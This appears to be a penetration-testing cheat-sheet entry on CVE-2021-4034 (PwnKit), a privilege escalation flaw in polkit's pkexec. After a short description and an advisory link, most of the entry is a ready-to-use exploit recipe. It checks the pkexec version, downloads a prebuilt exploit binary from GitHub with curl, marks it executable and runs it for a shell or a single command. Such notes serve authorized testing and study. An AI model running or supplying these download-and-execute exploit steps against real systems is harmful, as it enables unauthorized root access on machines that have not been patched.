CVE-2021-4034 - PwnKit

Brief

Discovered in January 2022

Polkit can be used to determine whether you have the requisite permissions to execute something. It is integrated with systemd and is much more configurable than the traditional sudo system. Sometimes referred to as the “sudo of systemd”, providing a granular system with which to assign permissions to users.

• https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt - More details

Exploit

# Check with :
pkexec --version

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
 
# execute
./PwnKit # interactive shell
./PwnKit 'id' # single command